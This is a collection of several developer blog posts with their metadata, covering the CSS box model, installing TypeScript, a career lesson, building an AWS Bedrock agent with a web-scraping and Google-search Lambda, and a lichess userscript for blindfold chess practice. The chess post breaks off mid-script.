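import { getItems, createItem } from "../controllers/itemController";

const router = Router();
router.get("/", getItems);
router.post("/", createItem);

export default router;
```

```typescript
// server/controllers/itemController.ts - request-handling logic.
import { Request, Response } from "express";

export const getItems = (req: Request, res: Response) => {
  res.json([{ id: 1, name: "Sample item" }]); // stand-in for a Mongoose query
};

export const createItem = (req: Request, res: Response) => {
  res.status(201).json(req.body); // stand-in for Model.create(req.body)
};
```

```typescript
// server/middleware/errorHandler.ts - processes errors before the response goes out.
import { Request, Response, NextFunction } from "express";

export const errorHandler = (err: Error, req: Request, res: Response, next: NextFunction) => {
  res.status(500).json({ error: err.message });
};
```

Because each concern lives in its own file, you can swap the in-memory stand-ins for real Mongoose models without touching the routes or the entry point.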
fullstackdev
1,921,396
What's In The Box?
Welcome back! We’re diving into the CSS Box-Model, a rite of passage for any web developer. Let’s...
27,613
2024-07-15T14:00:00
https://dev.to/nmiller15/whats-in-the-box-4nh0
html, css, webdev, beginners
![Se7en, What's in the Box?](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3d4p6dm7lqnuskp1rihb.gif)

Welcome back! We’re diving into the CSS Box Model, a rite of passage for any web developer. Let’s see: "What's in the Box!?"

---

## The Content Box

In web styling, **everything is in a box**. So far, we’ve only changed text sizes and colors. Now, we’ll explore positioning elements on a page with the CSS Box Model. It includes four parts: content, padding, border, and margin. The content box tightly wraps your content, whether text, images, or other elements. Consider this example web page:

![Example Web Page](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a9ci5x86338athqwguxa.jpg)

Here, the "Join the ride!" text is an `<h1>` element. The content box of that element looks like it wraps tightly around the text:

![Content Box Highlight](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9zi3fujfwt63nu8lhdfw.jpg)

Notice the space around it? These spaces are controlled by the box model. Without it, everything would stack in the top left corner, like this:

![Top and Left Style](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6z68qscb4hxd4su3tnu6.jpg)

The box model makes our pages interesting!

## Padding, Border, and Margin

The rest of the box model:

![Padding, Margin, and Border](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pefyl19i94rt9kckwzna.jpg)

**Padding:**

- Between the content box and the border
- Increases element size, combining with the content box for background properties

**Border:**

- The element’s edge, which can be styled

**Margin:**

- The space between elements, like an invisible pole pushing them apart

## Moving Things Around

Understanding the box model is crucial for positioning elements. To save you some trial and error:

- **To move the element:** change its margins.
- **To move the content inside the element:** change its padding.

---

## The Code

Let’s create our page:

```html
<!DOCTYPE html>
<html>
  <head><!-- Metadata and linking --></head>
  <body>
    <h1>Join the ride!</h1>
    <p>A new model, each week!</p>
  </body>
</html>
```

```css
h1 {
  /* Text Styles */
  margin: auto;
  margin-top: 60px;
  padding: 12px;
}

p {
  /* Text Styles */
  margin: auto;
  margin-top: 6px;
  padding: 3px;
}
```

Here’s the scoop:

- `margin` and `padding` control spacing. They’re actually shorthand properties that combine `margin-top`, `margin-right`, `margin-bottom`, and `margin-left`; `padding` has the same set of sub-properties.

Using one property, we can set the padding size on all edges of the element:

```css
p {
  padding: 12px 50px 100px 2px; /* top right bottom left */
}
```

Or we can set the top/bottom and the left/right to be symmetrical by setting only two values:

```css
p {
  padding: 12px 50px; /* top/bottom left/right */
}
```

Or set all the sides the same, by using one:

```css
p {
  padding: 12px; /* all sides */
}
```

Both `padding` and `margin` can use distance values (`px`, `em`) or percentages (`%`). The `auto` keyword is also handy in conjunction with `margin` for centering elements!

---

## Challenge

Time to test your skills!

1. Put four elements on a web page. Keep them roughly the same size.
2. Add borders around them (check [MDN](https://developer.mozilla.org/en-US/) for border styling).
3. Center one element.
4. Make another element’s border larger than its content.

You’ve got the tools. Now go position your elements like a pro!
--- For a much more robust look at the box model, check out [MDN's Documentation](https://developer.mozilla.org/en-US/docs/Learn/CSS/Building_blocks/The_box_model)!
nmiller15
1,921,397
How to Install TypeScript and write your first program
TypeScript has become a popular choice for many developers due to its strong typing and excellent...
28,050
2024-07-13T06:05:00
https://dev.to/jakaria/how-to-install-typescript-and-write-your-first-program-1fj4
webdev, typescript, programming, learning
TypeScript has become a popular choice for many developers due to its strong typing and excellent tooling support. In this guide, we'll walk you through installing TypeScript and writing your first TypeScript program.

#### Step 1: Install Node.js and npm

Before installing TypeScript, you need to have Node.js and npm (Node Package Manager) installed. You can download and install them from the [official Node.js website](https://nodejs.org/).

To check if Node.js and npm are installed, open your terminal and run:

```bash
node -v
npm -v
```

You should see the version numbers for both Node.js and npm.

#### Step 2: Install TypeScript

Once Node.js and npm are installed, you can install TypeScript globally using npm. Open your terminal and run:

```bash
npm install -g typescript
```

This command installs TypeScript globally on your machine, allowing you to use the `tsc` command to compile TypeScript files.

To verify the installation, run:

```bash
tsc -v
```

You should see the TypeScript version number.

#### Step 3: Create Your First TypeScript Program

1. **Create a New Directory**: Create a new directory for your TypeScript project and navigate into it:

   ```bash
   mkdir my-typescript-project
   cd my-typescript-project
   ```

2. **Initialize a New Node.js Project**: Initialize a new Node.js project to create a `package.json` file:

   ```bash
   npm init -y
   ```

3. **Create a TypeScript File**: Create a new file named `index.ts` manually or run this command:

   ```bash
   touch index.ts
   ```

4. **Write Your First TypeScript Code**: Open `index.ts` in your preferred text editor and add the following code:

   ```typescript
   const welcome: string = "Hello, World!";
   console.log(welcome);
   ```

#### Step 4: Compile TypeScript to JavaScript

To compile your TypeScript code to JavaScript, use the TypeScript compiler (`tsc`). In your terminal, run:

```bash
tsc index.ts
```

This command generates an `index.js` file in the same directory.

#### Step 5: Run the Compiled JavaScript

Now, you can run the compiled JavaScript file using Node.js:

```bash
node index.js
```

You should see the output:

```
Hello, World!
```

Next, let's go one step further: configure file paths so that source files and compiled output live in separate directories.

1. **Create a TypeScript Configuration File**
   - Create a `tsconfig.json` file by running:
     ```bash
     tsc --init
     ```
   - This command generates a `tsconfig.json` file.

2. **Configure File Paths**
   - Open the `tsconfig.json` file and set the `rootDir` and `outDir` options:
     ```json
     {
       "compilerOptions": {
         "rootDir": "./module/src",
         "outDir": "./module/dist"
       }
     }
     ```

3. **Create a TypeScript File**
   - Create a file named `hello.ts` inside the `module/src` directory and add the following code:
     ```typescript
     const welcome: string = "Hello, World!";
     console.log(welcome);
     ```

4. **Compile TypeScript to JavaScript**
   - To convert the TypeScript code to JavaScript, run:
     ```bash
     tsc
     ```
   - This will generate a `hello.js` file inside the `module/dist` directory.

5. **Run the Compiled JavaScript File**
   - Use Node.js to run the compiled JavaScript file:
     ```bash
     node module/dist/hello.js
     ```
   - You should see the output:
     ```
     Hello, World!
     ```

By following these steps, you've successfully installed TypeScript, configured file paths, and written and executed your first TypeScript program.
jakaria
1,921,400
Once You Touch It, You Own It!
While working for my last client, we needed to extend an existing feature. We had to import an Excel...
27,567
2024-07-15T05:00:00
https://canro91.github.io/2024/02/05/LessonsOnAFinishedProject/
career, softwareengineering, beginners, projectmanagement
While working for my last client, we needed to extend an existing feature. We had to import an Excel file with a list of guests into a group event. Think of importing all the guests to a wedding reception at a hotel. > "You only have to add your changes to this existing component. It's already working." That was what our Product Owner told us. I bet you have heard that, too. The next thing we knew was that the "already-working" component had issues. The original [team was laid off](https://canro91.github.io/2023/08/21/OnLayoffs/), and we couldn't get our questions answered or count on them to fix those issues. What was a simple coding task turned out to be a longer one. Weeks later, we were still fixing existing issues. **Before starting to work on top of an "already-working" feature: test it and give a list of existing issues.** Otherwise, those existing issues will appear as bugs in your changes. And people will start asking questions: > "Why are you taking so much time on this? It’s a simple task. It was already working." In my hometown, we have a saying: "Break old, pay new." Lesson learned! Once you touch it, you own it! *** _[Join my free 7-day email course to refactor your software engineering career now.](https://imcsarag.gumroad.com/l/careerlessonsfromthetrenches)_ _Happy coding!_
canro91
1,921,413
Adding Web Scraping and Google Search to AWS Bedrock Agents
Motivation After all of the AWS product announcements at the NYC Summit last week, I...
0
2024-07-17T17:27:07
https://dev.to/b-d055/adding-web-scraping-and-google-search-to-aws-bedrock-agents-55a8
docker, typescript, aws, ai
## Motivation

After all of the [AWS product announcements](https://aws.amazon.com/events/summits/new-york/) at the NYC Summit last week, I wanted to start testing out AWS Bedrock Agents more thoroughly for myself. Something clients often ask for is the ability for their LLM workflows to have access to the web. There is a web [scraper example from AWS](https://github.com/build-on-aws/bedrock-agents-webscraper) that covers this, but I wanted to make a version for NodeJS in TypeScript. I also wasn't happy with the Google search capability relying on web scraping, so I swapped it out for the Google custom search API. My solution will also be making use of the AWS CLI and Docker images to make things more consistent.

## Overview

(GitHub project available at the end of the article.)

Prerequisites:

- AWS CLI (v2)
- Docker
- NodeJS 20.x
- AWS Account
- Google Custom Search API Key

What we want to do is create a Bedrock agent and attach an action group with a Lambda function that can be called by the agent to perform Google searches and scrape web content. We'll accomplish this by defining a Lambda function using Docker and then attaching that function to the agent.

Tasks:

- Write function(s) to perform web scraping and Google search
- Build Docker image to test functions locally
- Deploy Docker image to AWS ECR
- Create Lambda function using ECR image as source
- Set up IAM roles/permissions
- Create Bedrock agent to use new Lambda function

## Creating the Lambda function

Let's start by defining a Lambda function using Docker. Why use Docker? Usually, I deploy Lambda-based apps using AWS SAM, but I wanted to try something different this time. Plus, Docker images are easier to test with locally (in my experience).

We'll start by following the [AWS documentation for deploying a TypeScript on NodeJS container image](https://docs.aws.amazon.com/lambda/latest/dg/typescript-image.html). I encourage you to read the AWS docs, but this is what we're going to do to get started (I'm using Node 20.x):

```bash
npm init
npm install @types/aws-lambda esbuild --save-dev
npm install @types/node --save-dev
npm install typescript --save-dev
```

Let's also install cheerio since we'll need it for web scraping later:

```bash
npm install cheerio
```

Then add a build script to the `package.json` file:

```json
...
"scripts": {
    "build": "esbuild index.ts --bundle --minify --sourcemap --platform=node --target=es2020 --outfile=dist/index.js"
}
...
```

Create a `Dockerfile`. I modified the example Dockerfile from AWS to use the `nodejs:20` base image:

```dockerfile
FROM public.ecr.aws/lambda/nodejs:20 as builder
WORKDIR /usr/app
COPY package.json ./
RUN npm install
COPY index.ts ./
RUN npm run build

FROM public.ecr.aws/lambda/nodejs:20
WORKDIR ${LAMBDA_TASK_ROOT}
COPY --from=builder /usr/app/dist/* ./
CMD ["index.handler"]
```

Great, now create an `index.ts`. Here's the placeholder `index.ts` provided by AWS, which is good for testing our setup:

```typescript
import { Context, APIGatewayProxyResult, APIGatewayEvent } from 'aws-lambda';

export const handler = async (event: APIGatewayEvent, context: Context): Promise<APIGatewayProxyResult> => {
    console.log(`Event: ${JSON.stringify(event, null, 2)}`);
    console.log(`Context: ${JSON.stringify(context, null, 2)}`);
    return {
        statusCode: 200,
        body: JSON.stringify({
            message: 'hello world',
        }),
    };
};
```

Build and run the container (name it whatever you like, I used `bedrock-scraper:latest`):

```bash
docker build --platform linux/amd64 -t bedrock-scraper:latest .
docker run --platform linux/amd64 -p 9000:8080 bedrock-scraper:latest ``` If we did everything properly we should be able to invoke the function and get our test result: ```bash curl "http://localhost:9000/2015-03-31/functions/function/invocations" -d '{}' ``` And we should see: ```bash {"statusCode":200,"body":"{\"message\":\"hello world\"}"}% ``` Everything's working well! Now we can start writing the "functions" that our agent will eventually use. ## Add the Web Scraper (cheerio) We're going to use [cheerio](https://cheerio.js.org/) to parse the content from websites ("web scraping"). First, we'll add import and typing at the top so we don't forget to return all properties [required by the Bedrock Agent.](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-lambda.html#agents-lambda-response) ```typescript import { Context, APIGatewayEvent } from 'aws-lambda'; import * as cheerio from 'cheerio'; interface BedrockAgentLambdaEvent extends APIGatewayEvent { function: string; parameters: any[]; actionGroup: string; } interface BedrockResult { messageVersion: string; response: { actionGroup: string; function: string; functionResponse: { responseState?: string; responseBody: any; } } } ... ``` Then we can modify the lambda `handler()` function to accept the new event type and return the new result type: ```typescript ... export const handler = async (event: BedrockAgentLambdaEvent, context: Context): Promise<BedrockResult> => { ... ``` How will our Lambda function know what URL to scrape? It will be passed from the Agent via the Event parameters. Inside our `handler()` we can add the following ```typescript let parameters = event['parameters']; ``` Let's assume the to-be-implemented agent is going to pass us a `url` parameter. Based on [the AWS docs](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-lambda.html), we can access this parameter like so: ```typescript let url = parameters.find(param => param.name === 'url')?.value || ''; ``` Next, we can get the html content using cheerio: ```typescript const response = await fetch(url); const html = await response.text(); const $ = cheerio.load(html); ``` Now let's parse out all the unnecessary tags and get the website text: ```typescript // Remove extraneous elements $('script, style, iframe, noscript, link, meta, head, comment').remove(); let plainText = $('body').text(); ``` Finally we can return the content in [the format that Bedrock needs](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-lambda.html#agents-lambda-response): ```typescript let actionResponse = { 'messageVersion': '1.0', 'response': { 'actionGroup': event['actionGroup'] || '', 'function': event['function'] || '', 'functionResponse': { 'responseBody': { 'TEXT': { 'body': '', } } } } }; actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({ 'text': plainText, }); return actionResponse; ``` Rebuild and rerun the container to test our changes: ```bash docker build --platform linux/amd64 -t bedrock-scraper:latest . docker run --platform linux/amd64 -p 9000:8080 bedrock-scraper:latest ``` Invoke the scrape function, we need to pass the parameters the same way the agent will, in the format we defined above: ```bash curl "http://localhost:9000/2015-03-31/functions/function/invocations" -d '{"parameters":[{"name":"url","value":"https://google.com"}]}' ``` We should get back some text that looks like the google home page. 
```bash
{"messageVersion":"1.0","response":{"actionGroup":"","function":"","functionResponse":{"responseBody":{"TEXT":{"body":"{\"text\":\"Search Images Maps Play YouTube News Gmail Drive More »Web History | Settings | Sign in Advanced searchAdvertisingBusiness SolutionsAbout Google© 2024 - Privacy - Terms \"}"}}}}}
```

Excellent, our web scraping function is set up! Let's move on to the Google search.

## Add the Google Search Tool (custom search API)

Before setting up search, you should follow Google's documentation on [creating a search engine](https://developers.google.com/custom-search/v1/introduction#create_programmable_search_engine) and [obtaining an API key](https://developers.google.com/custom-search/v1/introduction#identify_your_application_to_google_with_api_key).

With our custom search ID and API key in hand, it's simple to add a condition for it in our handler. I'm going to refactor the handler function a bit and add a new Google search section:

```typescript
export const handler = async (event: BedrockAgentLambdaEvent, context: Context): Promise<BedrockResult> => {
    let agentFunction = event['function'];
    let parameters = event['parameters'];

    let actionResponse = {
        'messageVersion': '1.0',
        'response': {
            'actionGroup': event['actionGroup'] || '',
            'function': event['function'] || '',
            'functionResponse': {
                'responseBody': {
                    'TEXT': {
                        'body': '',
                    }
                }
            }
        }
    };

    if (agentFunction === 'scrape') {
        // get URL from parameters
        let url = parameters.find(param => param.name === 'url')?.value || '';
        if (!url) {
            actionResponse['response']['functionResponse']['responseState'] = 'FAILURE';
            actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({
                'error': 'URL not found in parameters',
            });
            return actionResponse;
        }
        const response = await fetch(url);
        const html = await response.text();
        const $ = cheerio.load(html);
        // Remove extraneous elements
        $('script, style, iframe, noscript, link, meta, head, comment').remove();
        let plainText = $('body').text();
        console.log({plainText});
        // Limit of Lambda response payload is 25KB
        // https://docs.aws.amazon.com/bedrock/latest/userguide/quotas.html
        const maxSizeInBytes = 20 * 1024;
        if (Buffer.byteLength(plainText, 'utf8') > maxSizeInBytes) {
            while (Buffer.byteLength(plainText, 'utf8') > maxSizeInBytes) {
                plainText = plainText.slice(0, -1);
            }
            plainText = plainText.trim() + '...'; // Add an ellipsis to indicate truncation
        }
        console.log({plainText});
        actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({
            'text': plainText,
        });
        return actionResponse;
    } else if (agentFunction === 'google_search') {
        let query = parameters.find(param => param.name === 'query')?.value || '';
        if (!query) {
            actionResponse['response']['functionResponse']['responseState'] = 'FAILURE';
            actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({
                'error': 'Query not found in parameters',
            });
            return actionResponse;
        }
        const googleParams = {
            key: process.env.GOOGLE_SEARCH_KEY,
            cx: process.env.GOOGLE_SEARCH_CX,
            q: query,
        };
        // Encode each value so spaces and special characters survive the URL.
        const queryString = Object.keys(googleParams)
            .map(key => key + '=' + encodeURIComponent(googleParams[key]))
            .join('&');
        const response = await fetch(`https://www.googleapis.com/customsearch/v1?${queryString}`);
        const data = await response.json();
        if (data.items) {
            // only return title and link of first 10 results for smaller response payload
            const results = data.items.map((item: any) => {
                return {
                    title: item.title,
                    link: item.link,
                };
            }).slice(0, 10);
            actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({
                'results': results,
            });
            return actionResponse;
        } else {
            actionResponse['response']['functionResponse']['responseState'] = 'FAILURE';
            actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({
                'error': 'No results found',
            });
            return actionResponse;
        }
    } else {
        actionResponse['response']['functionResponse']['responseState'] = 'FAILURE';
        actionResponse['response']['functionResponse']['responseBody']['TEXT']['body'] = JSON.stringify({
            'error': 'Function not found',
        });
        return actionResponse;
    }
};
```

Interesting changes to point out:

- If condition based on the [function name passed to our Lambda](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-lambda.html) from Bedrock
- Use of environment variables instead of hardcoding our Google Search API key and [Custom Search Engine ID](https://programmablesearchengine.google.com/controlpanel/all)
- Truncate the response for both `google_search` and `scrape` functions due to [Lambda/Bedrock quota limits](https://docs.aws.amazon.com/bedrock/latest/userguide/quotas.html)
- Added some edge cases & error handling

Let's test it! Now that we are dealing with API keys as env variables, we should pass them into Docker at run time:

```bash
docker build --platform linux/amd64 -t bedrock-scraper:latest .
docker run -e GOOGLE_SEARCH_KEY=YOUR_SEARCH_KEY -e GOOGLE_SEARCH_CX=YOUR_CX_ID --platform linux/amd64 -p 9000:8080 bedrock-scraper:latest
```

Example cURL to test:

```bash
curl "http://localhost:9000/2015-03-31/functions/function/invocations" -d '{"function":"google_search", "parameters":[{"name":"query","value":"safest cities in USA"}]}'
```

My output:

```bash
{"messageVersion":"1.0","response":{"actionGroup":"","function":"google_search","functionResponse":{"responseBody":{"TEXT":{"body":"{\"results\":[{\"title\":\"The 10 Safest Cities in America | Best States | U.S. News\",\"link\":\"https://www.usnews.com/news/cities/slideshows/safest-cities-in-america\"}...
```

Perfect! Now let's deploy to Lambda so we can start using these functions.

## Deploy Lambda Function

Before connecting to Bedrock, we'll need to deploy our Lambda function. To do this, we can continue with the [AWS documentation](https://docs.aws.amazon.com/lambda/latest/dg/typescript-image.html) for "Deploying the Image". Start by creating an ECR repository and pushing our image to it.
_(Be sure to replace `111122223333` and `us-east-1` with your account ID and region)_ ```bash aws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin 111122223333.dkr.ecr.us-east-1.amazonaws.com aws ecr create-repository --repository-name bedrock-scraper --region us-east-1 --image-scanning-configuration scanOnPush=true --image-tag-mutability MUTABLE docker tag bedrock-scraper:latest 111122223333.dkr.ecr.us-east-1.amazonaws.com/bedrock-scraper:latest docker push 111122223333.dkr.ecr.us-east-1.amazonaws.com/bedrock-scraper:latest ``` Next, create a role for the Lambda function and create the Lambda function itself: _(Remember to replace `111122223333` and `us-east-1` with your account ID and region, `YOUR_SEARCH_KEY` and `YOUR_CX_ID` with your Google search key and CX ID)_ ```bash aws iam create-role \ --role-name lambda-ex \ --assume-role-policy-document '{"Version": "2012-10-17","Statement": [{ "Effect": "Allow", "Principal": {"Service": "lambda.amazonaws.com"}, "Action": "sts:AssumeRole"}]}' aws lambda create-function \ --function-name bedrock-scraper \ --package-type Image \ --code ImageUri=111122223333.dkr.ecr.us-east-1.amazonaws.com/bedrock-scraper:latest \ --role arn:aws:iam::111122223333:role/lambda-ex \ --timeout 30 \ --environment "Variables={GOOGLE_SEARCH_KEY=YOUR_SEARCH_KEY,GOOGLE_SEARCH_CX=YOUR_CX_ID}" ``` After the Lambda is done creating, we can test using the AWS cli to make sure our function works in Lambda: ```bash aws lambda invoke --function-name bedrock-scraper --cli-binary-format raw-in-base64-out --payload '{"function":"google_search", "parameters":[{"name":"query","value":"safest cities in USA"}]}' response.json ``` If we inspect `response.json` it should look something like: ```json { "messageVersion": "1.0", "response": { "actionGroup": "", "function": "google_search", "functionResponse": { "responseBody": { "TEXT": { "body": "{\"results\":[{\"title\":\"The 10 Safest Cities in America | Best States | U.S. News\",\"link\":\"https://www.usnews.com/news/cities/slideshows/safest-cities-in-america\"}..." } } } } } ``` Excellent - now let's expose this capability to a Bedrock agent. ## Add Bedrock Action Group and Permissions We first need to create a basic Bedrock agent. We can do this via the CLI. If you'd like more details on this process see the AWS documentation on [creating a Bedrock agent](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-create.html) and [adding an action group to a Bedrock Agent](https://docs.aws.amazon.com/bedrock/latest/userguide/agents-action-create.html). Start by creating a policy and role for the agent. This allows the agent to invoke the foundation model in Bedrock (Check your account to make sure the model you want is [available in your region](https://docs.aws.amazon.com/bedrock/latest/userguide/models-regions.html)). I'll be naming mine `BedrockAgentInvokeClaude` and applying to a role called `bedrock-agent-service-role`. 
_(Remember to replace `111122223333` and `us-east-1` with your account ID and region)_ ```bash aws iam create-policy --policy-name BedrockAgentInvokeClaude --policy-document '{"Version":"2012-10-17","Statement":[{"Sid":"VisualEditor0","Effect":"Allow","Action":"bedrock:InvokeModel","Resource":["arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-3-sonnet-20240229-v1:0","arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-3-5-sonnet-20240620-v1:0","arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-3-haiku-20240307-v1:0","arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-v2","arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-v2:1","arn:aws:bedrock:us-east-1::foundation-model/anthropic.claude-instant-v1"]}]}' aws iam create-role --role-name bedrock-agent-service-role --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"bedrock.amazonaws.com"},"Action":"sts:AssumeRole","Condition":{"StringEquals":{"aws:SourceAccount":"111122223333"},"ArnLike":{"AWS:SourceArn":"arn:aws:bedrock:us-east-1:111122223333:agent/*"}}}]}' aws iam attach-role-policy --role-name bedrock-agent-service-role --policy-arn arn:aws:iam::111122223333:policy/BedrockAgentInvokeClaude ``` Now we can create the Agent using Claude v3 sonnet as the model (you may need to [request access](https://docs.aws.amazon.com/bedrock/latest/userguide/model-access.html) to some models): _(Be sure to use the ARN of your new role from above)_ ```bash aws bedrock-agent create-agent \ --agent-name "scrape-agent" --agent-resource-role-arn arn:aws:iam::111122223333:role/bedrock-agent-service-role \ --foundation-model anthropic.claude-3-sonnet-20240229-v1:0 \ --instruction "You are a helpful agent that can search the web and scrape content. Use the functions available to you to help you answer user questions." ``` Using the `agentArn` of our new agent, give it permission to invoke the lambda function: _(Remember to use your own agent ARN/ID here)_ ```bash aws lambda add-permission \ --function-name bedrock-scraper \ --statement-id bedrock-agent-invoke \ --action lambda:InvokeFunction \ --principal bedrock.amazonaws.com \ --source-arn arn:aws:bedrock:us-east-1:111122223333:agent/999999 ``` Now, using our Lambda ARN from previously, let's add an action group: _(Remember to use your own Lambda ARN and agent ID here)_ ```bash aws bedrock-agent create-agent-action-group \ --agent-id 999999 \ --agent-version DRAFT \ --action-group-executor lambda=arn:aws:lambda:us-east-1:111122223333:function:bedrock-scraper \ --action-group-name "search-and-scrape" \ --function-schema '{"functions": [{"name":"google_search","description":"Search using google","parameters":{"query":{"description":"Query to search on Google","required":true,"type":"string"}}}, {"name":"scrape","description":"Scrape content from a URL","parameters":{"url":{"description":"Valid URL to scrape content from","required":true,"type":"string"}}}]}' ``` Now prepare the agent: _(Remember to use your own agent ID here)_ ```bash aws bedrock-agent prepare-agent --agent-id 999999 ``` Now, FINALLY, we can test our agent. ## Testing It's easy to test the agent using the [AWS console](https://console.aws.amazon.com/bedrock/). Go to **Bedrock** > **Agents** and you should see your new agent. Open it and click **Test**. 
Ask it a question only an agent with access to the web could answer:

![Bedrock agent test](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rnsklp3yequ14yxu88d9.png)
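The console is the quickest way to iterate, but you can also exercise the agent from code. Here's a minimal TypeScript sketch using the AWS SDK's Bedrock Agent Runtime client. The agent ID, session ID, and question are placeholders, and `TSTALIASID` is the alias ID Bedrock reserves for testing the `DRAFT` version of an agent:

```typescript
import {
  BedrockAgentRuntimeClient,
  InvokeAgentCommand,
} from "@aws-sdk/client-bedrock-agent-runtime";

const client = new BedrockAgentRuntimeClient({ region: "us-east-1" });

async function askAgent(question: string): Promise<string> {
  const response = await client.send(
    new InvokeAgentCommand({
      agentId: "999999", // your agent ID
      agentAliasId: "TSTALIASID", // built-in test alias for the DRAFT version
      sessionId: "test-session-1", // reuse the same ID to keep conversation state
      inputText: question,
    })
  );

  // The answer arrives as an event stream of text chunks.
  let completion = "";
  const decoder = new TextDecoder();
  for await (const event of response.completion ?? []) {
    if (event.chunk?.bytes) {
      completion += decoder.decode(event.chunk.bytes);
    }
  }
  return completion;
}

askAgent("What are the safest cities in the USA?").then(console.log);
```

To invoke a released agent, you would create a real alias with `aws bedrock-agent create-agent-alias` and pass that alias ID instead.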
## Cleanup && Thoughts

This was a quick-and-dirty way to get a Bedrock agent up and running. I will eventually turn this into a CloudFormation template to make it easier to deploy (star the GitHub for updates).

If you no longer want them, you can delete the Lambda function, ECR image, Bedrock agent, and IAM resources:

_(Don't forget to use your own account IDs and ARNs here)_

```bash
aws bedrock-agent delete-agent --agent-id 999999

aws iam detach-role-policy --role-name bedrock-agent-service-role --policy-arn arn:aws:iam::111122223333:policy/BedrockAgentInvokeClaude

aws iam delete-policy --policy-arn arn:aws:iam::111122223333:policy/BedrockAgentInvokeClaude

aws iam delete-role --role-name bedrock-agent-service-role

aws lambda delete-function --function-name bedrock-scraper

aws iam detach-role-policy --role-name lambda-ex --policy-arn arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole

aws iam delete-role --role-name lambda-ex

aws ecr delete-repository --repository-name bedrock-scraper --force
```

For more information on Bedrock agents and how to use them, see the [AWS documentation](https://docs.aws.amazon.com/bedrock/latest/userguide/what-is-bedrock.html).

Full code available on [GitHub](https://github.com/b-d055/bedrock-agents-webscraper-js).

Questions? Comments? Let me know, I look forward to seeing what you build with Bedrock! You can find me on [LinkedIn](https://www.linkedin.com/in/b-d055/) | CTO & Partner @ [EES](https://www.eesolutions.io/).

b-d055
1,921,416
Yet another attempt to get better at chess
Do you recall that golden period when your chess rating skyrocketed? When you were effortlessly...
0
2024-07-15T03:50:33
https://dev.to/mrdimosthenis/yet-another-attempt-to-get-better-at-chess-5fjm
chess, devtools
Do you recall that golden period when your chess rating skyrocketed? When you were effortlessly conquering opponents who seemed invincible? It felt like you could defeat anyone with just a little extra focus on the next game. Perhaps you even believed that your rating would continue to soar indefinitely. You may have even thought you were one of those rare few who effortlessly transitioned from beginner to expert. Sadly, this is almost never the case. That phase I described usually marks the transition from amateur to club player. It is at this stage that you come to realize that improvement requires effort and dedication. You understand the importance of tactical training, endgame theory, and preparation for different openings, as well as the need for strategic thinking. Not only must you invest countless hours in honing these skills, but you must also develop the intuition to blend them harmoniously. In fact, becoming better at chess requires consistent study. Every now and then, I tend to overlook this truth and delude myself into thinking there must be an easier path. It was during one of these moments of self-deception that I ended up creating the first version of [this](https://github.com/mrdimosthenis/BlindfoldChessTraining) mobile app. After a decade, I've made the decision to make better use of my limited time for chess. To achieve this, I've enabled the Zen mode in [lichess](https://lichess.org) and hidden all ratings. This allowed me to focus on enjoying the game rather than worrying about improvement. ![lichess display options](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/842pcgaedm1qob4gelcx.png) But once again, instead of studying chess, I started playing partially-blindfold games. Lichess allows players to use disguised pieces, where their color is visible but their specific figures are not shown. ![disguised pieces](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tbc10l2jfr26jm6q5baz.png) Without the visual cues of the chess pieces, I had to rely on memorizing each position. Although it took some time to adjust, I found that I now make fewer mistakes. It took me a couple of weeks to be able to play with disguised pieces, and I imagine most club players would find it equally manageable. However, I was still starving for a new challenge. Using JavaScript code in the browser's console, I changed all the pieces to white. ![no black piece](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m4jisogidgcktllteqd3.png) Concealing the color of the pieces encourages the mind to imagine the chessboard in more detail. We can aid this process by revealing the last move in the target square. The code below detects the most recent move and presents it in the center of the appropriate square. To ensure visibility, let's lessen the transparency of the pieces. 
```javascript document.querySelectorAll("cg-board piece").forEach(piece => { piece.style.opacity = '0.5'; }); const kwdbElements = document.querySelectorAll("kwdb"); const kwdbContent = kwdbElements[kwdbElements.length - 1].innerHTML; const lastMoveSquare = document.querySelector("cg-board square.last-move"); let textSpan = document.createElement('span'); textSpan.innerText = kwdbContent; textSpan.style.color = 'black'; textSpan.style.fontWeight = 'bold'; textSpan.style.fontSize = `${lastMoveSquare.offsetWidth * 0.2}px`; lastMoveSquare.style.display = 'flex'; lastMoveSquare.style.alignItems = 'center'; lastMoveSquare.style.justifyContent = 'center'; lastMoveSquare.appendChild(textSpan); ``` The result looks like this: ![last move notation](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wm1tgdt66egreacw2ef9.png) During a chess game, it is necessary to execute the code multiple times. To enable this, we can modify the code, install the [tampermonkey](https://www.tampermonkey.net) browser extension, and configure it for the lichess web pages. Below is the complete tampermonkey script: ```javascript // ==UserScript== // @name Update Lichess Piece Classes and Display kwdb Content // @namespace http://tampermonkey.net/ // @version 0.9 // @description Change piece classes to 'white' and display last kwdb content in last-move square // @author You // @match *://lichess.org/* // @grant none // ==/UserScript== (function() { 'use strict'; let lastKwdbContent = ''; function main() { document.querySelectorAll("cg-board piece").forEach(piece => { let classNames = piece.className.split(' '); if (classNames.length > 0) { classNames[0] = 'white'; piece.className = classNames.join(' '); 